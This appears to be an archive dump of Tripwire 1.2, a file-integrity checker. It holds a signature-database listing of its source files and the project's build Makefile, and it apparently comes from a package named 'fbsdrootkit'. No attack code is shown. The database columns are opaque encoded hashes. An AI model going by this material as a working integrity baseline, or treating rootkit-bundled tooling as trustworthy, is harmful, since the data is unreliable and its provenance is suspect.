2z1KI5MytcZgUuKncigQyF 2FtMrnbCMOoBmUmBEBXDLi 4DsYnHGZLJ3Q9:LeVgGPHgIu0rq 0IdRDvB9wGuyuv.ovUBTSZ 0 /tmp/genek/tripwire-1.2/sigs/crc32/crc32.h 0 00007R 100600 8505 1 856 856 79 0kOiv5 0iSmzL 0kOiv5 0 0ynHKVaYSFnXtqSxhs8.9Z 3D6p0H3grbhHVynFmLNwcU 1N0LDx 0000vI 07qvhscfdly0qRFScZHNbI 1vCnIeeqxw3peamPaZc5Xx 2OreCEYlKL9nW4y8hmRyryy.aur 36VpkKPweloghgAcj.jWA3 0 /tmp/genek/tripwire-1.2/sigs/haval 0 00007R 40740 10805 2 856 856 512 0kOivM 0kOiuS 0kOiv6 0 0 0 0 0 0 0 0 0 0 /tmp/genek/tripwire-1.2/sigs/haval/Makefile 0 00007R 100600 10806 1 856 856 321 0kOiv5 0k9cph 0kOiv5 0 1era4.NocXX8h9PLoiVYSY 2WmZTNqcoabzdorCAP9vUP 21gZbM 0002a2 3lJsmpDKp4RJaoz.f08gNn 2:JBdhrjVasuNNDbX:Ea7: 9sasHaiL7hn7cCtdWGG8JD:5LcU 1fNYXYEfZwlfk:kQFZ7azU 0 /tmp/genek/tripwire-1.2/sigs/haval/haval.c 0 00007R 100640 10807 1 856 856 27505 0kOiv5 0kCzvN 0kOiv5 0 0DAAd8qGEr7exr:j3otY0l 0UdKwg4CPexVexwddnmrJh 07Hpac 0009zj 0lYgjHXvge:q.Vch1UqDbi 3.HEwtR8Myc1eNEoDs154z 5orK84hdyIivbuCdVfz0yVSiz8P 3nUi7JY.Xs55QL:J26u1qs 0 /tmp/genek/tripwire-1.2/sigs/haval/haval.cert 0 00007R 100640 10808 1 856 856 702 0kOiv6 0k9cpk 0kOiv6 0 0uwCEV9E7TxdIthMJt2d3G 15QPCIljTCb1iQ.20mWNVQ 3wcgDu 000BWG 2N3K3jETojdnhPfWUe5S5d 1QIHeAileoeOMKChWTzAfT FTEVOERCRPC0gCnIEdCCUEO9EDl 146Z3.v.mwtx4qAm4MGge8 0 /tmp/genek/tripwire-1.2/sigs/haval/haval.h 0 00007R 100640 10811 1 856 
856 2448 0kOiv6 0k9cpl 0kOiv6 0 1zlnvZWDlae1gdqbqjSv9Q 3:q:RBKlgBX2tNqvuthJ8i 2cx4j: 0000Z9 1IRGNxsV63y7ze5IjfY:aC 3Ud0xVDHC:BhMIWVNNEimg Ez5GqYtKCXKXGyPr2vd8zciS6ns 2WKELyIuvCLdJ0KThlonID 0 /tmp/genek/tripwire-1.2/sigs/haval/havalapp.h 0 00007R 100640 10813 1 856 856 1048 0kOiv6 0kG6GP 0kOiv6 0 2f7FT3j642vAtRH0fYqhdk 2dQiZOXAeg1oedTl5WpPEB 279oN2 0002:j 3gKfkp:OI::69UrUg4Rmz7 11YMM4gnlaHSKWqf.n0Xt8 7abbDPL0CXrJbsILWM:yZARZ.Z2 2nRlY5SNK:ASdoI3iRVnrJ 0 /tmp/genek/tripwire-1.2/sigs/haval/havaltest.c 0 00007R 100640 10814 1 856 856 6632 0kOiv6 0kG6GR 0kOiv6 0 0T.8StLmSXk8hR7woZye:n 1fRziWdPz1XOrnak7JcHeJ 097d3b 0009SX 21FofAcEYj.rSFdncgYIib 03oa2SP.2vTvcSw6pV8ZUe 15p5z0Toy2Ww0h8RP7Ub3Srs.KP 1oTDdgarRa:uWct7tmD1:d 0 /tmp/genek/tripwire-1.2/sigs/haval/havalwrapper.c 0 00007R 100640 10815 1 856 856 1852 0kOiv6 0kCzvR 0kOiv6 0 1.izhBVZ0wA46WwxsxtfsI 3s:JzvDFObMtG2SPtIckhV 2l70.o 000F8S 0AhunP7e07A6z:V2Qo.TUi 2xz.d0cwQDM2FtY.GJZxkf 3PV76lN5gSSObCdqxooEDBi0imL 1yGV.gwM8AdbAebqDQATcU 0 /tmp/genek/tripwire-1.2/sigs/md2 0 00007R 40740 15378 2 856 856 512 0kOivM 0kOiuS 0kOiv7 0 0 0 0 0 0 0 0 0 0 /tmp/genek/tripwire-1.2/sigs/md2/Makefile 0 00007R 100600 15387 1 856 856 293 0kOiv6 0iy5vM 0kOiv6 0 1.zCsZMXIfyCFDwkfKdBtB 30XCMKX:iBlatHC2BaKbUh 2spuM1 000Ed4 1CyzOSdT.zJbcwfnaGPTwq 1EZ32aeUVvRfmh90ozZOdL E0k1NtWFxQ9r7AGsAz:u6uU3MnA 0BLdK0RYWxe2BJilYvNpVS 0 /tmp/genek/tripwire-1.2/sigs/md2/global.h 0 00007R 100600 15388 1 856 856 856 0kOiv6 0iSmzO 0kOiv6 0 1DcG7R76MwKXvw:5A4v0mA 0C3RhN5kGuSz7G86LPtEdy 3DrjFT 0005no 2p3M.6UAxr79X74x1N5fL5 3u5klnQDzw0Of:YsEkoDPD 36BBSL5uHD9KgK3nw:RsB46zaqa 3jvCcPKeArmQJGsO4xFeyC 0 /tmp/genek/tripwire-1.2/sigs/md2/md2.c 0 00007R 100600 15391 1 856 856 7127 0kOiv6 0k9cpv 0kOiv6 0 3nGNXP:KnQimVLBKLyqyvL 209vEmxw4MRjFVrYPBJkuC 0Fijil 000EII 149zoHOfSfZufZtc1NTQR. 
0ctdsxHV4n9YwFEWYN2jWG 4f14MzrL1NkgnUhgFqEGdIIIWnQ 3dF1vaVJ81Ur17oZl74xQc 0 /tmp/genek/tripwire-1.2/sigs/md2/md2.h 0 00007R 100600 15395 1 856 856 1214 0kOiv6 0iSmzQ 0kOiv6 0 0ZI8kLOHwlsA7v5ECwjwEr 1Z7:sI0xEcVjq2w9bZrZqJ 1OxGo0 0007Ll 0UpIvnmwyaYu86xVlrxWUJ 20XEaBI336yqiElyW0a6vT 8cgpnu:lPLm6OscpuMN.BkNNzjA 2Nyds3A0FWV.NkQ.7ye:GX 0 /tmp/genek/tripwire-1.2/sigs/md2/md2wrapper.c 0 00007R 100600 15397 1 856 856 1944 0kOiv7 0kCzvT 0kOiv7 0 3js1QN6YzIA02:Tinyirvs 12Y9k49K7rcKdhuhMJ1BdM 1.fwGq 0002In 0okkDNzGszlw1OM7IpsGkC 08j7cqKCcLw3vBmVF1I68B 50I70y9en4X4Vdl5JTw9odE52t0 0jPId5yXUa7x:7J2IQj:ZR 0 /tmp/genek/tripwire-1.2/sigs/md4 0 00007R 40740 17718 2 856 856 512 0kOivM 0kOiuS 0kOiv7 0 0 0 0 0 0 0 0 0 0 /tmp/genek/tripwire-1.2/sigs/md4/Makefile 0 00007R 100600 17746 1 856 856 312 0kOiv7 0iy5vO 0kOiv7 0 2my7Acd6wLC4YuRSH6dzAF 18SI:DxzSM:OqC3JyAEc4c 3PHnsa 0008I. 2DGz5jWuGOO3LraUNJsLlh 1lAsvCZBbB17z0Qv94LBlp AE8b1zhAnXsGn8RYfBElB1G7C0f 3wVThW5BaFcwkcy25iww2q 0 /tmp/genek/tripwire-1.2/sigs/md4/md4.c 0 00007R 100600 17747 1 856 856 9904 0kOiv7 0kCzvW 0kOiv7 0 3vRK7p4WYzdR8Or5iSK:j. 3I305g7XdmOgKrjW6HaAAh 1jkCcL 000Axt 34IfzO.XsW4rVxzpd7LxZO 20LbIQuscpBYv3Tfs.ZTPU 1:lZhtftl8bm5Ls4c2NSM3Ch:NN 2CTomD0XxIzgEaUSuWsAag 0 /tmp/genek/tripwire-1.2/sigs/md4/md4.h 0 00007R 100600 17751 1 856 856 1920 0kOiv7 0iSmzV 0kOiv7 0 2rPuz1Uhc:QDjlq7aW6H6. 
1iS3ddg9imQCJHog3.tgo7 3DGEW9 000CTX 1nTfGrLN:O0sCGbhZa865R 2Pbrew7SZqwhUvJgbBBNsY 5UWWH:7Qh9bsnUk404puIrMMe7s 0CEa6sCWO0Yvdfgq1V1tsI 0 /tmp/genek/tripwire-1.2/sigs/md4/md4wrapper.c 0 00007R 100600 17752 1 856 856 1906 0kOiv7 0kCzvX 0kOiv7 0 2SI1SgxXHVI0NnXUfZVRH2 0MvdRksljcl7170vhHs9Ef 0bAUmo 000EmA 3xkiJbkE6leRRbbWL5O1Tf 2o7SETzuWhHX9VB675Qb.2 0CIt5sETZ9Q:mtap:syHxqMMR:9 3QV8WJ8ftrsjZBs8XGXESM 0 /tmp/genek/tripwire-1.2/sigs/md5 0 00007R 40740 20785 2 856 856 512 0kOivM 0kOiuS 0kOiv8 0 0 0 0 0 0 0 0 0 0 /tmp/genek/tripwire-1.2/sigs/md5/Makefile 0 00007R 100600 20786 1 856 856 309 0kOiv7 0iy5vQ 0kOiv7 0 16aazat3hycq.3ave6YC.e 28xfZ1wNjpZhFwPNO3Nm3w 3HMl1X 0008A1 08q6IW36tFm9A6NpmGsX5v 3qi95jnPPDhA8qTzpPyNkc BYNTkfbjDbU2Bg9BiUjKhbVuO1V 2Ww9i5uc:4yqY7wVMXkCoY 0 /tmp/genek/tripwire-1.2/sigs/md5/README.md5 0 00007R 100600 20789 1 856 856 2575 0kOiv8 0iSmzZ 0kOiv8 0 3659z16SPZZ4YfCH:gm2Sp 10vQfEOBpDfpkB5pJ4MK49 2WgoTf 000CQi 1RkqrCtfUvopnlwNnkKPGd 2QNxv84hnvD:aT2McJamUT 6G0992oszrXSwFSz3669nPPSaPx 1:NE8DGniXeSHXyvCtcQMp 0 /tmp/genek/tripwire-1.2/sigs/md5/md5.c 0 00007R 100600 20792 1 856 856 10289 0kOiv8 0iy5vQ 0kOiv8 0 37MokxbAjdrw5Ovtg8Wtgr 1A8qihV105oPyxp0mNF4:P 0EuEB3 0000Zn 3JwvvSJVSSsvs2fuL:JkIv 3i4HIRKyJkuuQTtFL:yjlM 7TnQpsTrOv7MwMYx4NDhBWTXAny 19T7ENS1U8orCBpxn:2CBq 0 /tmp/genek/tripwire-1.2/sigs/md5/md5.doc 0 00007R 100600 20793 1 856 856 19119 0kOiv8 0iSmzb 0kOiv8 0 3muulH4lKYOKH8zFgX6kcd 1PveHh2o72ch7T8NzUcKPN 2NNGsP 0004g0 0tCAFQ5N19LWzuVOUrH7PN 1Y3ZIMh1K:Fv6Hf1Be708v 3yUK2HyzggyCivBOEf4p4IVaoEG 0o2GTLZ0vr4oJtPiOHcBA5 0 /tmp/genek/tripwire-1.2/sigs/md5/md5.h 0 00007R 100600 20794 1 856 856 1139 0kOiv8 0k9cp: 0kOiv8 0 0dzgN.0CItEkU4zOsY6PO4 1sW3n8PBn3k4OLsEQgXXTm 2S7dI4 000FL2 0psbpqfYaypFwHkcQj4ZNo 3qwV.BXUe3U59s5I.XPaih 9Ufv5Od1WaON4cn5P38.rhpWPO1 0tHCDNQuAUBmw8saLBODd4 0 /tmp/genek/tripwire-1.2/sigs/md5/md5wrapper.c 0 00007R 100600 20795 1 856 856 2032 0kOiv8 0kCzvZ 0kOiv8 0 0nR.9i2lAVOUTVjj7TI.q0 3EN3ieTsDkXddMjqgVIkYX 0YTMMM 0006tf 2C.VP5gDnkNSOgPxQhF2tn 
3hAxGe5EfJFMPkN3998TtM FyJjqXoPO8zBphPDa2xjFzjWa7v 3BCAsEfh.9jNZQXDbEed2i 0 /tmp/genek/tripwire-1.2/sigs/sha 0 00007R 40740 23096 2 856 856 512 0kOivM 0kOiuT 0kOiv9 0 0 0 0 0 0 0 0 0 0 /tmp/genek/tripwire-1.2/sigs/sha/Makefile 0 00007R 100600 23101 1 856 856 292 0kOiv8 0iy5vW 0kOiv8 0 2ZdiPtncH9HIHmBvZbwERb 1bqkJd7XBHRfhIyu5oE9Yw 1XUAEK 0003Xv 0kPtl65YwQ3xYY1M0Jb.ee 0XC9pn:WdpZVUvexFYJZ1r FlwW40wByQS59EA7mpxilGj9or6 1QQeLEhaQrmD.Zoe1uF7:u 0 /tmp/genek/tripwire-1.2/sigs/sha/sha.c 0 00007R 100640 23102 1 856 856 11560 0kOiv8 0kCzvb 0kOiv8 0 3e2V8qEqTk5URVpuTa1RTO 1exV5tSrqEIOMySpQaaD1a 30LIBb 000DSy 1lTaICcqs9esqn0g1cMy7. 0ncJZGIYtvj0BNfVSa9t10 BKkwd7yHtMHXs3Udg7Zgav30yIQ 3lh3IRSc5PraqtwakWDNs3 0 /tmp/genek/tripwire-1.2/sigs/sha/sha.h 0 00007R 100640 23103 1 856 856 1414 0kOiv9 0kCzvd 0kOiv9 0 1.p8PdV38IHPLX6F:tnkbK 3iLE2d0woFfBvtFe92:RRf 0frx4B 000Axh 2gS:OQvAnH37je1vhm9Lkg 2x79sTtAA7MMzl6peS7vyE 2Lkx4k0NZ4fEoMYRg4cxyyjquZm 08FKVTU76TR1OJ1BOVmBsR 0 /tmp/genek/tripwire-1.2/sigs/sha/shawrapper.c 0 00007R 100600 23104 1 856 856 2092 0kOiv9 0kCzve 0kOiv9 0 0D.8IL:5q85eQmym:7tJZi 1ZVvDtFaCftdBW2KAt7Yap 20GbeI 0007v5 10nzNmr3hLFXAynsz0t0Rx 1iTT3XzD8App7ILLSOVnM2 7SVitQ3NC0R:McYS5RG6v2RfJhD 1jUXMV7gWboSyZ4uTZidMD 0 /tmp/genek/tripwire-1.2/sigs/snefru 0 00007R 40740 25435 2 856 856 512 0kOivM 0kOiuT 0kOivC 0 0 0 0 0 0 0 0 0 0 /tmp/genek/tripwire-1.2/sigs/snefru/Makefile 0 00007R 100600 25436 1 856 856 250 0kOiv9 0iy5vX 0kOiv9 0 2.lPuquu9XUAeAD1SOC.9N 2B.VXEwvx5q0DBebqlN3p9 1CfHll 000F6f 10uJS6Cjr.tWxp7ySXdCwO 0Fb7ErysO3zCACvh0gcYHr F4yLf6PFb278C67mha.qEcLHtDu 3J:T:2dsmVB00XotvbI0i4 0 /tmp/genek/tripwire-1.2/sigs/snefru/README.snefru 0 00007R 100600 25437 1 856 856 8500 0kOiv9 0iSmzi 0kOiv9 0 2CVxs9hG4q7jipWWRWsOzn 1hAzaZ4YmhAhOaj7IbvcTj 21DzIF 0003cY 2:SYi8LwxceadLLPL7gB3s 3xJRPVxz4qq3HCeeDc.3Za 8fwZw50G6QoLosNM6ZZQKu3165O 2wIzvvGuVmbTOrsQHnp3nf 0 /tmp/genek/tripwire-1.2/sigs/snefru/snefru.c 0 00007R 100600 25438 1 856 856 81153 0kOiv9 0kCzvi 0kOiv9 0 1uWtmZa3JBqo06pGcUcz:Z 
1lK7snyy4fTRfqoSL1DouI 09N9QN 0007JN 0eyUuMIUSkBsm7B4I.2hVr 16ZOj2MzV1cWc3qStipTJm EWcmto6aFh6pn.ICb4XcEZXpjrB 3JhDRtKciuCwFjUvPbAGZS 0 /tmp/genek/tripwire-1.2/sigs/snefru/snefru.h 0 00007R 100600 25439 1 856 856 92 0kOivA 0igw:k 0kOivA 0 0Wy72aFEiIYyrEJmyLLmVL 0kGLEVAWRJq7mTMq9VXEdY 0BDehQ 00084J 2.Dxm:hxELGF7gmnixPY27 33Efjug4S:wBP.fIu6:5wy FC:sGPhv.SdWdwGt2:RgKvR4Ve. 0d6vOSk2FL:EKvZ:IuM:J6 0 /tmp/genek/tripwire-1.2/src 0 00007R 40740 26931 2 856 856 512 0kOivM 0kOiuT 0kOivF 0 0 0 0 0 0 0 0 0 0 /tmp/genek/tripwire-1.2/src/Makefile 0 00007R 100600 26932 1 856 856 8364 0kOivD 0kCzq6 0kOivD 0 02fIZhFi17p8wkMZ4VfAM3 2T3XJsN4ytazTDinpeWCDx 1L0VS8 000DH4 2R1ycBTkNSAAcg3rwqr500 3x9BPjQSvrkxxppP0hjNc8 9LAMLRNqrH1lgDSuaziHJ8WtBFc 0g9O.jtacjIuvqYFhHQ.aX 0 /tmp/genek/tripwire-1.2/src/config.parse.c 0 00007R 100600 26933 1 856 856 16391 0kOivD 0kBSbU 0kOivD 0 0G1Ji8HeeXQlXFmOlx7D9X 2Q7URdrP0AdAhZUOVNiKRH 3N:ngW 000Fnd 1ul3Y66U0qYc.XwyB7t6Ev 3X8Zt0JEkevYg5slqKh:4q 7KuXcWOOT80A5X2g9jTejeuLGAJ 3NZ3F8PuSn175rIvZummu5 0 /tmp/genek/tripwire-1.2/src/config.pre.l 0 00007R 100600 26934 1 856 856 3233 0kOivD 0kCzq7 0kOivD 0 3ujnicH4z1lebjgUS5GZ:. 3jAdqZWPJAmz9:KQFdBjNd 2vD3zf 0006ke 3AXb6P6RAlqXQUGypuLCo3 1FCT.N:paoAuBAnDuobHgp A2G5ZySq2FlAiEgnXQpneOdpYhe 3p4oVlwmzSHOHqF4jwJkDk 0 /tmp/genek/tripwire-1.2/src/config.pre.y 0 00007R 100600 26935 1 856 856 11484 0kOivD 0kG6GW 0kOivD 0 04PLslZHvHpTWKSwJw3:u. 
0abFVARWu.Pcd9hw7D9qQJ 1n38z7 0002bA 0WPR79nVNY820SZ2WaQVgW 2jvBieeIe87d8y:ht:yeBp Ax314LdmNyemXcmR4zfzZRHqtv0 2GQuJ4ZBDw:POmbAMJYz.Q 0 /tmp/genek/tripwire-1.2/src/config.prim.c 0 00007R 100600 26936 1 856 856 3005 0kOivD 0jds2I 0kOivD 0 1Z.A2:izSZAhifnLRJNqNm 3je0Qh4gXdw.M2jw1mFFYe 1JZd.1 000CSv 0NkLYxulKXGWLf:1XmWCtk 0Kb1R7vTvzQ5fhRrbOB9B1 AC:wGJSK6J.wLT1GLs1s1XQ7t1D 3WiZ2xLllFrmawvxx8fvV3 0 /tmp/genek/tripwire-1.2/src/dbase.build.c 0 00007R 100600 26937 1 856 856 15005 0kOivD 0kCzaP 0kOivD 0 2WdPLU:lUi.NRsTOLXBMyr 0GJfWHoLYlKe9le0uz72dG 0ol:qI 0001S5 3dm7T124FsHcrpRAqqXkK5 2sJwoRA.auoEYeC80LYcyZ FPX7vbO3eAiPf6abyQ3cOFqt4qz 2HgofgqAutDnZCQmEgdFqT 0 /tmp/genek/tripwire-1.2/src/dbase.update.c 0 00007R 100600 26938 1 856 856 3275 0kOivD 0kA8qC 0kOivD 0 0wS3AVhyzsL6q.5UqZcNDT 0e07GDitIwnqylfXIUzImu 2AQlSB 0000Za 22Q1LQEXeLXIXB.zfH44ga 3Vs7ZNcJf3HmPH0fVbYHR9 9RMp4GbFkAiNvvG3YPQf7n5NAZw 1rLzAVEeIesA9v53Kvn8IT 0 /tmp/genek/tripwire-1.2/src/help.sh 0 00007R 100700 26939 1 856 856 587 0kOivD 0jds2M 0kOivD 0 38C.RjjdQE11IqPBUHuvt. 3G7WNV:wWQycqG.rvrCfPe 3RIVb. 
00077Q 2PcQ3atAAGo9zWapIm.QdA 1J9GEMo6dfS0A:c2IhcXoE DuM4njLdIAzV1cSq1aCuf1q3ssG 1Zar0FG:6pC5QRtneZceIC 0 /tmp/genek/tripwire-1.2/src/help.txt 0 00007R 100600 26940 1 856 856 1060 0kOivD 0jds2N 0kOivD 0 32m01BhseVZe4FoNxy9nvd 18TEL0IA23wy9sfusaD:jQ 1FoN3O 000E0U 2NLI7Ljl2nMvvIwNftXK.o 34FRsGXo2OgHtyB1J:Ac4f 9sTQVBeXrJZEqsKVVdAJWwM8pir 3Lsi4dvxbDI5aU8kPOvFSR 0 /tmp/genek/tripwire-1.2/src/ignorevec.c 0 00007R 100600 26941 1 856 856 3692 0kOivE 0k9cqG 0kOivE 0 2WQiSCVctrkKTVO2Mn7IvW 25gnKCUoOy1Y2ERa8q2ztK 15ZAQ8 0003Fn 2mm4ObtHF.ZaPxrwXyp7rU 1GvUJdNwoLS0ofkDBb57gp FeCX:bUwH:RNHevCBlVFsv4x11q 3omcenaI4Yj0Y4X.Qlt6AP 0 /tmp/genek/tripwire-1.2/src/list.c 0 00007R 100600 26942 1 856 856 16912 0kOivE 0kA8NH 0kOivE 0 1cgiTzGpjgH8vsLbbXPQvo 08a9jxOUicb6gUIT8ZZhtV 2rT7BZ 0008e9 3Y56Z9ZlZsEGZBwizLnC5C 2Y3HJo9j4:OCZD9XQ3NPBa C5Z5.ajA2EH8ULdj8Y35UYNZiAA 0VfHcp:fJ4EQFvJ6DhD.XK 0 /tmp/genek/tripwire-1.2/src/main.c 0 00007R 100600 26943 1 856 856 18065 0kOivE 0kNQPd 0kOivE 0 1lsW0avkPmVl6LpPElIRC: 1JFnF1gtZ6OXJbhkL2CBDX 001mhA 000EXg 31rpR3mZO1v4bSXhmUfdYM 14P9WNhBjwwF2NzbzxxINi 6DKfqfzZqiaz0:g5KiCtQms.Cjq 2GzdU4wGTaF74hbM.5Nosz 0 /tmp/genek/tripwire-1.2/src/md4convert.sh 0 00007R 100700 26944 1 856 856 2262 0kOivE 0htnSx 0kOivE 0 3yB.NsHFFy0xUci.cai5oj 1tJPzfUT6kOndbCC4L8.Gh 1F9zwV 0006Xw 2oN4FrW9lB9qJ.n9HdaOte 0TI927:fN44xAUxqTN3.IQ 2Swyu72gN9bEtb4Nx5NdBV5fkNI 3lUme:ygner:OO9SIxXRxr 0 /tmp/genek/tripwire-1.2/src/nullsig.c 0 00007R 100600 26945 1 856 856 1145 0kOivE 0kABZZ 0kOivE 0 2U3sBrr:hMoGSHgx98R50G 3mcFxpD1Grz5zeyJJydF1g 0ktdbN 0007L6 2MnVjzLGgCHBmVcGw.8nir 1YYXsTyEHqlgKceGo9LXuN 3AHr6ObVTR:3xcV3Mo6a0Y6ddoL 3glVh:d5LvEIXuBbgB9oG0 0 /tmp/genek/tripwire-1.2/src/preen.c 0 00007R 100600 26946 1 856 856 19421 0kOivE 0kCzaR 0kOivE 0 3sJyoIfZRwm2:DbmEaLcCO 2cJwNna6uaky:jo1RcAvDX 2BUP48 000D7C 15PZU.IOvBGLcsJfrZOpBY 1SIBXo2ShOUXfgo3PoBhbh 7Emr0FBH25K2xkUQAbAOpuzj4Ot 0ey9lwNlFD14lew6gecJNx 0 /tmp/genek/tripwire-1.2/src/preen.interp.c 0 00007R 100600 26947 1 856 856 3096 0kOivE 0jds2W 
0kOivE 0 3slNGosN0C1R3YoZ3egeEC 30xg5iczSHIRikI8.qdBKC 2ooPru 0006eV 0czuZ0BwmjnJkZnSytKOxL 2snen4yvjLPX2o:YL85cMl 9Ez63xRpcr.qHGhvO7RuRNHnUuH 2xWymDeAYoyiz7iSKI00yb 0 /tmp/genek/tripwire-1.2/src/preen.report.c 0 00007R 100600 26948 1 856 856 24089 0kOivE 0kG6GY 0kOivE 0 0L2PRWCWhPmPRghg.dbKYD 20PUlXV30AYsdHJCBH6KJu 1E.XhU 00045r 0Rccj3mZdueY8Idu3SlvV7 3RnE2K6Ym9OgPOGo24W6Af 19k:xH1fb8pCpclNGApliWvldg: 1GLCg5Ir2miCVlwijF5JIg 0 /tmp/genek/tripwire-1.2/src/siggen.c 0 00007R 100600 26949 1 856 856 4548 0kOivE 0kCzaS 0kOivE 0 3rqnhIv8vyOXSN1yv7zwzh 3IMhhnz5mU:r.GZYmSxCO7 2Lxr8T 0001rV 2dCAJr:csWa2VpcvniM3D. 1YEILzs1cvCvSGbQqwQzZT 9puNJs37:vm9fVsT:plPwyowlnf 2m7DcA7ZbZUt3o8PShHgMT 0 /tmp/genek/tripwire-1.2/src/twdb_check.pl 0 00007R 100740 26950 1 856 856 3590 0kOivE 0kNQPf 0kOivE 0 2Sk8bIyNBxM7DnSDBfEKk6 2g1lV:fxIyAbYhXiklIpMK 0mcB6h 000Eq8 0xsMf:4KAREMTEkdw90CaB 072xRwErDViWOkJYSxM0NZ 8gz0VdeZWJ3Y6BuLbd6hPttSSEu 3v0fxXcSFO2yJ.aXwmh4cj 0 /tmp/genek/tripwire-1.2/src/utils.c 0 00007R 100600 26951 1 856 856 18264 0kOivE 0kC:Rq 0kOivE 0 10UVknv7MGNKsvjt92Rumg 1A.wa78zN:geIm8FJYv2hY 1qK5oU 00045o 0kiIQcXJKVXyXeZFga4w3y 0NZzQDjlcetcQ5qm.k7tZa FdtS.tDzcPMc:NhIyrn5CXZzqXk 0EDVj98zdcEWquGpKvCCVV 0 /tmp/genek/tripwire-1.2/tests 1 001... 40740 27710 3 856 856 512 0kOivM 0kOiuT 0kOivG 0 0 0 0 0 0 0 0 0 0 /tmp/genek/tripwire-1.2/tests/Makefile 1 001... 100600 27711 1 856 856 835 0kOivF 0j3vVC 0kOivF 0 0 0 0 0 0 0 0 0 0 /tmp/genek/tripwire-1.2/tests/createfiles.c 1 001... 100640 27712 1 856 856 2177 0kOivF 0iTjcJ 0kOivF 0 0 0 0 0 0 0 0 0 0 /tmp/genek/tripwire-1.2/tests/test.escape.sh 1 001... 100740 27713 1 856 856 7331 0kOivF 0j2dOv 0kOivF 0 0 0 0 0 0 0 0 0 0 /tmp/genek/tripwire-1.2/tests/test.inter.sh 1 001... 100740 27714 1 856 856 7995 0kOivF 0jQRXB 0kOivF 0 0 0 0 0 0 0 0 0 0 /tmp/genek/tripwire-1.2/tests/test.twpre.sh 1 001... 100740 27715 1 856 856 1455 0kOivF 0jQRXC 0kOivF 0 0 0 0 0 0 0 0 0 0 /tmp/genek/tripwire-1.2/tests/test.update.sh 1 001... 
100740 27716 1 856 856 8790 0kOivG 0jQRXE 0kOivG 0 0 0 0 0 0 0 0 0 0 /tmp/genek/tripwire-1.2/tests/test0.key 1 001... 100640 27717 1 856 856 7181 0kOivG 0kCz.s 0kOivG 0 0 0 0 0 0 0 0 0 0 /tmp/genek/tripwire-1.2/tests/test0.sh 1 001... 100640 27718 1 856 856 709 0kOivG 0j2dOz 0kOivG 0 0 0 0 0 0 0 0 0 0 /tmp/genek/tripwire-1.2/tests/test1.sh 1 001... 100600 27719 1 856 856 1623 0kOivG 0j3qDn 0kOivG 0 0 0 0 0 0 0 0 0 0 /tmp/genek/tripwire-1.2/tests/tw.conf.test 1 001... 100600 27720 1 856 856 2030 0kOivG 0kC:Rt 0kOivG 0 0 0 0 0 0 0 0 0 0 /tmp/genek/tripwire-1.2/tests/tw.db_TEST 1 001... 100600 27721 1 856 856 41757 0kOivG 0kNgku 0kOivG 0 0 0 0 0 0 0 0 0 0 @@contents /tmp/genek/tripwire-1.2 0 @@contents /tmp/genek/tripwire-1.2/tests 1 fbsdrootkit-1.2/tripwire-1.2/Makefile.dist100600 764 764 7112 6273465277 15723 0ustar dfdf# $Id: Makefile,v 1.16 1994/07/25 15:59:41 gkim Exp $ # # Tripwire build # # See the README file before running this! # ### ### Start of user-modified settings ### Examine these and change the ones that need to be ### Altered on your system ### # destination directory for final executables DESTDIR = /secureplace/bin # destination for man pages MANDIR = /usr/man # system utilities LEX = lex #LEX = flex # For the GNU crowd YACC = yacc #YACC = bison -y # For the GNU crowd (make it look like yacc) # # see ./contrib/README.linux for tips on # # making work. # for SVR4 make (must be a Bourne-type shell) SHELL = /bin/sh #SHELL = /bin/ksh # Another common shell #SHELL = /bin/bash # For the GNU fanatics # you can use ANSI C if you like, but K&R is equally fine. CC = cc # common #CC = gcc # also common #CC = /usr/ccs/bin/cc # Pyramid DC/OSx (SVR4) CFLAGS = -O # common #CFLAGS = -g # common #CFLAGS = -g # debugging #CFLAGS = -O -cckr # SGI # NOTE: some versions of the HP C compiler optimizer breaks snefru.c! 
# consider recompiling this file separately without optimization #CFLAGS = -O -Aa -N # HP/UX ansi #CFLAGS = -O -Ac -N # HP/UX K&R #CFLAGS = -O -Ac -N -Wl,-a,archive # HP/UX K&R, ensure archived, static link #CFLAGS = -systype bsd43 # ETA/10 (SVR3) #CFLAGS = -systype bsd43 # MIPS RISC/OS 4.5x #CFLAGS = -O -ansi # gnu CC #CFLAGS = -O -ansi -W -Wreturn-type -Wswitch -Wshadow # gnu CC w/all warnings #CFLAGS = -OG # Pyramid OSx #CFLAGS = -O -Kold # Pyramid DC/OSx (SVR4) #CFLAGS = -DTW_TYPE32='int' # DEC OSF/1 Alpha (or any other architecture # where int [but not long] is a 32 bit quantity) # a C preprocessor (to build inode.h) CPP = $(CC) -E # common #CPP = /usr/lib/cpp # on older systems #CPP = /lib/cpp # on older systems # make sure libraries are not linked dynamically (as a security measure: a statically linked binary does not depend on shared libraries that could be replaced on the host). # The uncommented default sets no flag; pick the static option for your linker. LDFLAGS= # common #LDFLAGS= -non_shared # OSF/1 #LDFLAGS= -Bstatic # SunOS 4 (cannot statically link tripwire # on Solaris 2.3) #LDFLAGS= -dn # Pyramid DC/OSx (SVR4) # libraries LIBS = # common #LIBS = -lsocket # SCO #LIBS = -lmalloc -lsun -lc_s # IRIX 4.0 #LIBS = -lx # Xenix #LIBS = -lbsd # MIPS RISC/OS #LIBS = -lgnumalloc # Encore / UMAX V # If you don't have the install command, you need to replace # the use of it later in the makefile with a cp and chmod INSTALL= /usr/bin/install # common #INSTALL= /usr/ucb/install # Pyramid DC/OSx (SVR4) #INSTALL= /etc/install # Pyramid OSx #INSTALL= /bin/cp # no install #INSTALL= /usr/bin/installbsd # OSF/1 (DEC only?) # how you get hostname information (BSD vs.
SYSV style) HOSTNAME = "hostname" # BSD #HOSTNAME = "uname -n" # System V ### ### End of user-modified settings ### You should not need to change anything after this ### DIST = tripwire-1.2 all: (cd aux; make CC=$(CC) CFLAGS="$(CFLAGS)" \ LDFLAGS="$(LDFLAGS)" CPP="$(CPP)" SHELL=$(SHELL) all) (cd src; make CC=$(CC) CFLAGS="$(CFLAGS)" LIBS="$(LIBS)" \ LDFLAGS="$(LDFLAGS)" CPP="$(CPP)" SHELL=$(SHELL) \ YACC="$(YACC)" LEX="$(LEX)" all) install: all (cd src; make INSTALL=$(INSTALL) DESTDIR=$(DESTDIR) install) (cd man; make INSTALL=$(INSTALL) MANDIR=$(MANDIR) install) test: all (cd tests; make HOSTNAME=$(HOSTNAME) DIST=$(DIST) SHELL=$(SHELL) \ CC=$(CC)) clean: (cd src; make clean) (cd man; make clean) (cd aux; make clean) (cd tests; make clean) rm -f core clobber: clean (cd src; make clobber) (cd man; make clean) (cd aux; make clean) (cd tests; make clean) rm -f core rm -f */*_pure_*.o sigs/*/*_pure_*.o 